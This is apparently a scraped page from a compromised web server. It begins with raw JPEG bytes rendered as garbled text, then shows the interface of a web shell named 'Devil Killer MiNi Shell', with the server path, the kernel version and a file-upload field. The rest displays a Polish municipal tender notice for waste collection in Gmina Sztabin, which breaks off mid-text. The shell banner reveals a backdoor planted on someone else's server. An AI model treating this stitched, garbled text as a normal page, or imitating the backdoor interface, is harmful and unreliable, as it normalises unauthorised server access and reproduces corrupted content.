JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201109/607842-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 607842-N-2020 z dnia 2020-11-09 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Sztabin</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbiór odpadów komunalnych wytworzonych przez właścicieli nieruchomości zamieszkałych na terenie Gminy Sztabin oraz z terenów i obiektów komunalnych w okresie od 01.01.2021r. do 31.12.2022r. </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Sztabin</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">54220900000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Augustowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">53</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">16-310</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Sztabin</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">876 439 750</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">Janusz.Lotkowski@sztabin.ug.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">876 439 751</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.sztabin.ug.gov.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://ugsztabin.bip.gov.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://ugsztabin.bip.gov.pl/ http://www.sztabin.ug.gov.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty nalezy składać osobiście, przesłać pocztą lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Sztabin,ul. Augustowska 53, 16-310 Sztabin</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbiór odpadów komunalnych wytworzonych przez właścicieli nieruchomości zamieszkałych na terenie Gminy Sztabin oraz z terenów i obiektów komunalnych w okresie od 01.01.2021r. do 31.12.2022r. </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OAG.271.7.2020.JL</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest odbiór odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Sztabin oraz z terenów i obiektów komunalnych.Zamówienie udzielone zostanie w dwóch częściach:1)	Część 1 zamówienia – obejmuje odbiór odpadów zmieszanych i segregowanych od właścicieli nieruchomości zamieszkałych.2)	Część 2 zamówienia – obejmuje odbiór i zagospodarowanie odpadów zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin (urząd gminy, szkoły, place, przystanki autobusowe, świetlice, remizy itp.) Wykonawca może złożyć ofertę na jedną lub dwie części zamówienia.UWAGA! Zamówienie nie obejmuje odbioru odpadów komunalnych z nieruchomości niezamieszkałych (m.in. przedsiębiorcy, sklepy, bank, poczta, ośrodek zdrowia itp. ) z zastrzeżeniem dotyczącym Części 2 zamówienia. Przez odpady segregowane należy rozumieć odpady komunalne zbierane selektywnie, a przez odpady zmieszane – odpady pozostałe po segregacji i odpady niesegregowane (powstałe w przypadku niedopełnienia przez właściciela nieruchomości obowiązku selektywnego zbierania odpadów komunalnych).Wykonawca zobowiązany jest do odbierania od właścicieli nieruchomości zamieszkałych (Część 1) oraz z terenów i obiektów komunalnych (Część 2) każdej ilości zebranych odpadów komunalnych.Odbiór odpadów komunalnych winien odbywać się zgodnie z wytycznymi obowiązującego Wojewódzkiego Planu Gospodarki Odpadami dla Województwa Podlaskiego, obowiązującymi uchwałami Rady Gminy Sztabin tj. w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie Gminy Sztabin, w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz innymi aktami prawa krajowego lub miejscowego mogącymi mieć wpływ na realizację zamówienia.Instalacja Komunalna dla Gminy Sztabin to:Zakład Zagospodarowania Odpadów Komunalnych w Koszarówce ze Stacją Przeładunkową w Augustowie lub w Dąbrowie Białostockiej;Zakład Recyklingu w Dolistowie Starym.Operator Instalacji, to BIOM sp. z o. o. z siedzibą w Dolistowie Starym 144,19-124 Jaświły, Biuro Zarządu: Zabiele 37, 19-124 Jaświły, tel. 85 733 18 20, tel./fax 85 716 17 55.Odpady komunalne zebrane od właścicieli nieruchomości z terenu Gminy Sztabin należy przekazać do:Zakładu Zagospodarowania Odpadów w Koszarówce ze Stacją Przeładunkową w Augustowie lub Dąbrowie Białostockiej – odpady komunalne zmieszane, popiół zebrany selektywnie, odpady wielkogabarytowe, zużyte opony i odpady ulegające biodegradacji ze szczególnym uwzględnieniem bioodpadów;Zakładu Recyklingu w Dolistowie Starym – odpady komunalne selektywnie zebrane (papier i tektura, szkło, tworzywa sztuczne, metale, zużyte urządzenia elektryczne i elektroniczne, przeterminowane lekarstwa).Przekazywanie odpadów do Zakładu Zagospodarowania Odpadów w Koszarówce i Zakładu Recyklingu w Dolistowie Starym odbywać się będzie na podstawie Porozumienia nr 9/G/BSGO-II/2013 z dnia 28.06.2013 r. zawartego pomiędzy Zamawiającym i właścicielem Instalacji (BIOM sp. z o. o. w Dolistowie Starym) na zagospodarowanie odpadów, zgodnie z którym Zamawiający ponosi koszty ich zagospodarowania. Wykonawca będzie zobowiązany podpisać umowę z BIOM sp. z o.o. w Dolistowie na nieodpłatne przekazywanie odpadów komunalnych zebranych od właścicieli nieruchomości na terenie gminy Sztabin – przed podpisaniem umowy na realizację przedmiotowego zamówienia Wykonawca winien przedłożyć Zamawiającemu umowę z BIOM sp. z o. o.Zamówienie obejmuje :•	Odbiór odpadów komunalnych zmieszanych, gromadzonych przez mieszkańców w pojemnikach o pojemności min. 120 l oraz odbiór selektywnie zbieranych odpadów komunalnych gromadzonych przez mieszkańców w workach – Część 1 zamówienia, następujących frakcji odpadów:- papier i tektura,- tworzywa sztuczne, opakowania wielomateriałowe i metale,- odpady opakowaniowe ze szkła,- popiół,- bioodpady stanowiące odpady komunalne- pozostałe odpady zbierane selektywnie tj.: - zużyty sprzęt elektryczny i elektroniczny,- meble i inne odpady wielkogabarytowe,- zużyte opony,- przeterminowane lekarstwa.•	Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin (urząd gminy, szkoły, place, przystanki autobusowe, świetlice, remizy itp.) – Część 2 zamówienia. W zakresie Części 2, odpady komunalne będą segregowane przy szkołach podstawowych w Sztabinie, Krasnymborze i Jaminach oraz przy budynku urzędu gminy w Sztabinie. Odpady segregowane będą gromadzone w pojemnikach o poj. 1100 l , dla następujących frakcji odpadów:- papier i tektura,- tworzywa sztuczne, opakowania wielomateriałowe i metale,- odpady opakowaniowe ze szkła,3.	Szacunkowa planowana łączna ilość wytwarzanych odpadów zmieszanych i segregowanych objętych niniejszym zamówieniem wynosi około 800 ton rocznie. Ilość ta została określona przez Zamawiającego z należytą starannością, należy traktować ją jednak jako przybliżoną. W 2019 r. ilość wytworzonych odpadów segregowanych (z nieruchomości zamieszkałych i niezamieszkałych) wyniosła 305,42 Mg w tym: - papier i tektura – 20,94 Mg- tworzywa sztuczne, opakowania wielomateriałowe i metale – 114,55 Mg- odpady opakowaniowe ze szkła – 67,51 Mg- bioodpady stanowiące odpady komunalne – 6,44 Mg- pozostałe odpady segregowane –95,98 MgW 2019 r. ilość wytworzonych odpadów zmieszanych (z nieruchomości zamieszkałych i niezamieszkałych) wyniosła 580,88 Mg.Zamawiający nie posiada szczegółowych informacji odnoście ilości odpadów pochodzących tylko z nieruchomości zamieszkałych, dlatego też wyżej podano ilości dla nieruchomości zamieszkałych i niezamieszkałych.W pierwszym półroczu 2020 r. wytworzono następujące ilości odpadów (tylko nieruchomości zamieszkałe):- odpady zmieszane: 226,38 Mg,- odpady segregowane: 165,86 Mg, w tym:papier i tektura – 16,08 Mg,tworzywa sztuczne, opakowania wielomateriałowe i metale – 36,14 Mg,odpady opakowaniowe ze szkła – 38,34 Mg,bioodpady, stanowiące odpady komunalne – 4,44 Mg, pozostałe odpady segregowane – 70,86 MgDane dotyczące ilości posesji z których odbierane będą odpady zmieszane i segregowane, na dzień 2 listopada 2020 r.Łączna ilość posesji z których odbierane będą odpady komunalne zmieszane i segregowane wynosi 1241. Odpady zmieszane i segregowane wytwarzane będą we wszystkich gospodarstwach domowych na terenie Gminy Sztabin. Ilość nieruchomości (obiekty i tereny komunalne) objętych Częścią 2 zamówienia wynosi 27.4.	Dane dotyczące Gminy Sztabin, istotne z punktu widzenia zamówienia: Obszar Gminy Sztabin wynosi 361,8 km2. W skład Gminy Sztabin wchodzi 40 sołectw: 1) Balinka; 2) Budziski; 3) Cisów; 4) Czarniewo; 5) Czarny Las; 6) Długie; 7) Ewy; 8) Fiedorowizna; 9) Hruskie + Wilkownia; 10) Huta; 11) Jagłowo; 12) Jaminy + Łubianka; 13) Janówek; 14) Jasionowo; 15) Jasionowo Dębowskie + Dębowo; 16) Jastrzębna Druga; 17) Jastrzębna Pierwsza; 18) Jaziewo; 19) Kamień; 20) Jagłowo; 21) Karoliny; 22) Komaszówka; 23) Kopiec; 24) Kopytkowo; 25) Krasnoborki; 26) Krasnybór; 27) Kryłatka; 28) Kunicha; 29) Lebiedzin; 30) Lipowo; 31) Mogilnice; 32) Motułka + Chomaszewo; 33) Ostrowie; 34) Podcisówek; 35) Polkowo; 36) Sosnowo; 37) Sztabin; 38) Ściokła; 39) Wolne; 40) Wrotki + Klonowo.W Gminie Sztabin zameldowane są 5128 osoby, w tym około 80 osób zamieszkuje w blokach Wspólnoty Mieszkaniowej w Sztabinie.Powyższe dane o ilości osób i nieruchomości mogą ulec zmianie na skutek ruchu ludności. Liczba nieruchomości zamieszkałych może w niewielkim stopniu ulec zmianie, w wyniku oddania do użytku i zamieszkania nowych budynków lub wyludnienia. W ramach realizacji Części 1 zamówienia, Wykonawca zobowiązany jest do zapewnienia i wyposażania nieruchomości, w których odbierane odpady komunalne gromadzone w sposób selektywny (wszystkich nieruchomości zamieszkałych), w kolorowe worki o pojemności 120 L z folii LDPE o grubości zapewniającej wytrzymałość worków, przeznaczone na gromadzenie odpadów segregowanych. Komplet worków składa się z: 1.	niebieskiego oznaczony napisem „Papier” – z przeznaczeniem na odpady z papieru, w tym tektury, odpady opakowaniowe z papieru, odpady opakowaniowe z tektury;2.	zielonego oznaczony napisem „Szkło” – z przeznaczeniem na odpady ze szkła, w tym odpady opakowaniowe ze szkła;3.	żółtego oznaczony napisem „Metale i tworzywa sztuczne” – z przeznaczeniem na odpady metali, w tym odpady opakowaniowe z metali, odpady tworzyw sztucznych, w tym odpady opakowaniowe z tworzyw sztucznych, oraz odpady opakowaniowe wielomateriałowe;4.	brązowego oznaczony napisem „Bio” – z przeznaczeniem na bioodpady stanowiące odpady komunalne; 5.	bezbarwnego oznaczony napisem „Popiół” – z przeznaczeniem na popiół pochodzący z palenisk domowych.Po każdorazowym odbiorze tych odpadów należy pozostawić worki w ilości odpowiadającej potrzebom właściciela nieruchomości w tym zakresie (cena worków wliczona w cenę oferty). W ramach realizacji Części 2 zamówienia, Wykonawca udostępni z dniem 1 stycznia 2021 roku Urzędowi Gminy Sztabin, bez ponoszenia przez Zamawiającego z tego tytułu żadnych kosztów, następujące rodzaje pojemników, z których odbierane będą zmieszane odpady komunalne:- 30 pojemników PA.1.1 o pojemności 1100 litrów,- 10 pojemników MGB-120 o pojemności 120 litrów,z których:- 15 pojemników PA.1.1 zostanie ustawionych na trzech placach (parkingach) zlokalizowanych we wsiach Sztabin, Jaminy i Krasnybór (po 5 pojemników w każdej miejscowości), - 15 pojemników PA.1.1 zostanie ustawionych przy dwóch szkołach (Sztabin, Krasnybór), przedszkolu w Sztabinie, przy Urzędzie Gminy w Sztabinie, Gminnym Ośrodku Pomocy Społecznej w Sztabinie i plaży w Sztabinie,- 10 pojemników MGB-120 zostanie ustawionych przy Centrum Biblioteczno – Kulturalnym w Sztabinie, , remizach OSP i świetlicach wiejskich w Jagłowie, Jaminach, Jastrzębnej Pierwszej, Jaziewie, Krasnymborze, Mogilnicach, Polkowie, Sztabinie, Jastrzębnej Drugiej. W ramach realizacji Części 2 zamówienia Wykonawca udostępni z dniem 1 stycznia 2021 roku Urzędowi Gminy Sztabin, bez ponoszenia przez Zamawiającego z tego tytułu żadnych dodatkowych kosztów, następujące rodzaje pojemników, z których odbierane będą segregowane odpady komunalne: 15 pojemników PA.1.1 o pojemności 1100 litrów, w tym: - 4 szt. na szkło, - 4 szt. na papier,- 7 szt. na tworzywa sztuczne. Pojemniki te będą ustawione przy dwóch szkołach (Sztabin, Krasnybór) oraz Urzędzie Gminy w Sztabinie. Wykonawca udostępni z dniem 1 stycznia 2021 roku dla Wspólnoty Mieszkaniowej w Sztabinie na podstawie umowy wynajmu, dzierżawy lub innej formy dysponowania pojemnikami, bez ponoszenia przez Zamawiającego z tego tytułu żadnych kosztów następujące rodzaje pojemników, z których odbierane będą odpady komunalne:- pojemniki do odpadów zmieszanych (dotychczas był to pojemnik KP-7) – dotyczy Części 1,- pojemniki do gromadzenia popiołu (dotychczas był to pojemnik KP-7) – dotyczy Części 2,- pojemniki z tworzywa sztucznego oznaczone odpowiednimi kolorami w stosunku do każdego rodzaju odpadu selektywnie zbieranego, o pojemności 1100 l (litrów) do następujących odpadów (dotyczy Części 2) : - szkło, - papier i tektura,- tworzywa sztuczne, metale drobne, opakowania wielomateriałowe, bioodpady stanowiące odpady komunalne.HARMONOGRAM ODBIORU ODPADÓW.Wykonawca zobowiązany jest do odbierania odpadów komunalnych według ustalonego harmonogramu bezpośrednio z terenu 